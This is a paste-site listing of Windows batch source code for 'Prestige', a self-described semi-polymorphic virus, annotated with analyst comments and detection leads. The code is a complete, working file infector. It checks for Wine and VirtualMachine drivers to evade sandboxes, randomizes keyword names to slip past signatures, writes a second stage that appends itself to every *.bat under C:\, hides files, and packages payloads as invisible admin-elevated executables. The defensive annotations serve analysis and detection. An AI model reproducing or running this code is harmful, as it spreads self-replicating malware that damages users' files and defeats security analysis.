FlyFar

Prestige - A Semi-Polymorphic Batch Virus - Source Code

Jul 12th, 2023
  1. ::This is a polymorphic engine written completely in Batch
  2. ::@blmvxer
  3. ::
     ::ANALYSIS: this first section is environment fingerprinting. Every positive
     ::check jumps to :AVWVBEM, which only runs "exit", so nothing past this section
     ::runs under Wine or on a guest that exposes the driver files listed below.
     ::A detonation environment that exposes these artefacts will record only the
     ::early exit, so an empty sandbox report is not evidence that the sample is benign.
  4. ::We Need Anti-Wine(Utilize-Wine), Anti-Vbox, and Anti-Emulator::
  5. @echo off
  6. ::Check for WINE
     ::The presence of a Z:\ drive is the only Wine indicator used here.
  7. IF EXIST "Z:\" (GOTO WINE) ELSE (GOTO NOWINE)
  8. :WINE
  9. echo "Wine Exist time to go!!!"
  10. goto AVWVBEM
  11. :NOWINE
  12. echo "Wine Not Found Continue"
  13. ::Anti-VirtualMachine
      ::File-existence probes for guest drivers: the vm*.sys names are VMware guest
      ::drivers and VBoxMouse.sys belongs to the VirtualBox Guest Additions.
      ::Detection lead: a script that probes this set of driver paths in sequence
      ::is a behavioural indicator of sandbox evasion in its own right.
  14. IF EXIST "C:\windows\system32\drivers\vmci.sys" (GOTO AVWVBEM)
  15. IF EXIST "C:\windows\system32\drivers\vmhgfs.sys" (GOTO AVWVBEM)
  16. IF EXIST "C:\windows\system32\drivers\vmmouse.sys" (GOTO AVWVBEM)
  17. IF EXIST "C:\windows\system32\drivers\vmscsi.sys" (GOTO AVWVBEM)
  18. IF EXIST "C:\windows\system32\drivers\vmusbmouse.sys" (GOTO AVWVBEM)
  19. IF EXIST "C:\windows\system32\drivers\vmx_svga.sys" (GOTO AVWVBEM)
  20. IF EXIST "C:\windows\system32\drivers\vmxnet.sys" (GOTO AVWVBEM)
  21. IF EXIST "C:\windows\system32\drivers\VBoxMouse.sys" (GOTO AVWVBEM) ELSE (GOTO Lets_Begin)
  22. :Lets_Begin
      ::ANALYSIS: name generator. The :loop section runs ten times (counter 1..10)
      ::and stores one random alphanumeric string per pass in AAA, BBB, CCC, DDD,
      ::FFF, GGG, LLL, MMM, JJJ and KKK. Only these names vary between runs; the
      ::statements written out later are fixed text with the names substituted in.
      ::Detection should therefore key on command structure and behaviour, not on
      ::variable names or file names.
  23. ::Set counter to 0 so we can run a new encryption for different strings
  24. set counter=0
  25. ::Polymorphic Engine
  26. :loop
      ::Delayed expansion is needed for the !var! reads used below.
  27. setlocal EnableDelayedExpansion
  28. ::Set Longest Length to be 20
  29. set _RNDLength=20
  30. ::Our Character Pool
  31. set _Alphanumeric=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
  32. set _Str=%_Alphanumeric%987654321
  33. :_Lenloop
      ::Length measurement: repeatedly drops 9 characters from the padded copy and
      ::adds 9 to _Len, then adds the digit found at offset 9 of the remainder.
      ::_Len is later used as the modulus applied to %random%.
  34. if not "%_Str:~18%"=="" set _Str=%_Str:~9%& set /A _Len+=9& goto :_Lenloop
  35. set _tmp=%_Str:~9,1%
  36. set /A _Len=_Len+_tmp
  37. set _count=0
  38. set _RndAlphaNum=
  39. :_loop
  40. ::The Magic!
      ::Appends one character taken at index (%random% mod _Len) of the pool per
      ::pass, until _count reaches _RNDLength.
  41. set /A _count+=1
  42. set _RND=%random%
  43. set /A _RND=_RND%%%_Len%
  44. set _RndAlphaNum=!_RndAlphaNum!!_Alphanumeric:~%_RND%,1!
  45. if !_count! lss %_RNDLength% goto _loop
  46. ::String Encryption
  47. ::We run through the whole Engine for each String to allow a completely random character length
  48. ::and Generated String.
      ::No cipher is involved: "encryption" here means assigning the freshly
      ::generated string to the next slot, selected by counter.
  49. set /A counter=%counter%+1
  50. if %counter% EQU 1 set AAA=!_RndAlphaNum!
  51. if %counter% EQU 2 set BBB=!_RndAlphaNum!
  52. if %counter% EQU 3 set CCC=!_RndAlphaNum!
  53. if %counter% EQU 4 set DDD=!_RndAlphaNum!
  54. if %counter% EQU 5 set FFF=!_RndAlphaNum!
  55. if %counter% EQU 6 set GGG=!_RndAlphaNum!
  56. if %counter% EQU 7 set LLL=!_RndAlphaNum!
  57. if %counter% EQU 8 set MMM=!_RndAlphaNum!
  58. if %counter% EQU 9 set JJJ=!_RndAlphaNum!
  59. if %counter% EQU 10 set KKK=!_RndAlphaNum!
      ::After the tenth string the script proceeds to :ENCR; otherwise it loops.
  60. if %counter% EQU 10 (goto ENCR) else (goto loop)
  61. :ENCR
  62. ::Virus Protection
      ::ANALYSIS: copies poly.exe into the root of C:\ under the random name held
      ::in FFF, then deletes the original copy from the working directory.
      ::Hunting lead: an .exe with a random-looking alphanumeric name created
      ::directly under C:\, followed by deletion of the file it was copied from.
  63. copy /Y poly.exe C:\!FFF!.exe
  64. del /F poly.exe
  65. goto VIRUS
  66. ::Here is where we pass our encryption over to the virus,
      ::ANALYSIS: this section writes a second-stage batch file, named after the
      ::random string in DDD, one echo at a time. The generated file hides or
      ::unhides itself with attrib, walks C:\ for *.bat files and appends its own
      ::contents to them (file-infector behaviour).
      ::Detection leads: one process recursively enumerating *.bat under C:\ and
      ::then opening many of them for append; attrib +r +h followed by
      ::attrib -r -h on the same script; a .bat file that starts by assigning
      ::"for", "do" and "type" to randomly named variables.
  67. :VIRUS
      ::us holds the text the generated file uses to refer to itself.
  68. set "us=%%0"
  69. set "lvar=@echo off"
  70. (
  71. echo !lvar!
  72. ) > !DDD!.bat
  73. ::Attributes
      ::Emits a line that marks the running script read-only and hidden.
  74. set "attrib1=attrib +r +h !us!"
  75. (
  76. echo !attrib1!
  77. ) >> !DDD!.bat
  78. ::Standard SET Encryption with PolyStrings
      ::Keyword indirection, not encryption: for/do/type are bound to the random
      ::names in AAA/BBB/CCC so that the later lines never contain the literal
      ::keywords. Static signatures on those keywords will miss the generated file.
  79. echo set !AAA!=for >> !DDD!.bat
  80. echo set !BBB!=do >> !DDD!.bat
  81. echo set !CCC!=type >> !DDD!.bat
  82. set "var=%%%%a"
  83. set "var2=%%%%F"
  84. set "var6=%%%%"
  85. set "var7=in"
      ::SrcCount/SrcMax are emitted as a counter and a random upper bound for the
      ::file walk that follows.
  86. echo SET SrcCount=0 >> !DDD!.bat
  87. echo SET SrcMax=%%RANDOM%% >> !DDD!.bat
      ::Emits the recursive walk over C:\*.bat that selects the target file.
  88. set "findvictim=%%!AAA!%% /R !var2! IN (C:\*.bat) DO IF !SrcCount! LSS %%SrcMax%% ("
  89. (
  90. echo !findvictim!
  91. ) >> !DDD!.bat
  92. set "var3=SET %/A% SrcCount += 1"
  93. set "var4=Set victim=!var6!!var2!"
  94. set "var5=)"
  95. (
  96. echo !var3!
  97. echo !var4!
  98. echo !var5!
  99. ) >> !DDD!.bat
  100. ::Push the completed virus code to new host
       ::Emits the line that appends the script's own contents to the chosen file.
  101. set "virus=%%!AAA!%% /R !var! !var7! (%%victim%%) %%!BBB!%% %%!CCC!%% !us! >> !var!"
  102. (
  103. echo !virus!
  104. ) >> !DDD!.bat
  105. ::Attributes 2
       ::Emits a line that clears the read-only and hidden attributes again.
  106. set "attrib2=attrib -r -h !us!"
  107. (
  108. echo !attrib2!
  109. ) >> !DDD!.bat
  110. goto :CheckOS
  111. ::
       ::ANALYSIS: packaging and staging. The generated batch file and poly.bat are
       ::each passed to b2exe64.exe or b2exe32.exe; the choice depends on whether
       ::%PROGRAMFILES(X86)% exists. The converter is not part of this listing;
       ::from the flags it is presumably a bat-to-exe wrapper asked for a hidden
       ::window, elevation and overwrite -- confirm against the actual binary.
       ::Indicators visible in this listing: the hard-coded directory
       ::C:\fij4Jdo9mdn00sqW (identical on every run, unlike the random names),
       ::the file names b2exe32.exe / b2exe64.exe / poly.bat / poly.exe, and the
       ::command-line pattern "-bat <file> -save <file> -invisible -admin -overwrite".
  112. :CheckOS
  113. IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)
  114. :64BIT
  115. start b2exe64.exe -bat !DDD!.bat -save !DDD!.exe -invisible -admin -overwrite
  116. GOTO DONE
  117. :32BIT
  118. start b2exe32.exe -bat !DDD!.bat -save !DDD!.exe -invisible -admin -overwrite
  119. GOTO DONE
  120. :DONE
       ::Removes the intermediate .bat, then stages the converted .exe and poly.bat
       ::in the fixed directory.
  121. del !DDD!.bat
  122. mkdir C:\fij4Jdo9mdn00sqW
  123. move !DDD!.exe C:\fij4Jdo9mdn00sqW
  124. move poly.bat C:\fij4Jdo9mdn00sqW
  125. :CheckOS2
       ::Second conversion: poly.bat (the engine itself) is wrapped into an .exe
       ::named after the random string in MMM, inside the staging directory.
  126. IF EXIST "%PROGRAMFILES(X86)%" (GOTO 641BIT) ELSE (GOTO 321BIT)
  127. :641BIT
  128. start b2exe64.exe -bat C:\fij4Jdo9mdn00sqW\poly.bat -save C:\fij4Jdo9mdn00sqW\!MMM!.exe -invisible -admin -overwrite
  129. GOTO END
  130. :321BIT
  131. start b2exe32.exe -bat C:\fij4Jdo9mdn00sqW\poly.bat -save C:\fij4Jdo9mdn00sqW\!MMM!.exe -invisible -admin -overwrite
  132. ::END
       ::Cleanup of the converter binaries and poly.exe. During triage, check for
       ::leftover copies of these files next to the script in case this cleanup
       ::did not complete.
  133. del /f %curdir%\b2exe32.exe
  134. del /f %curdir%\b2exe64.exe
  135. del %curdir%\poly.exe
       ::Shared exit target for every anti-analysis check at the top of the script.
  136. :AVWVBEM
  137. exit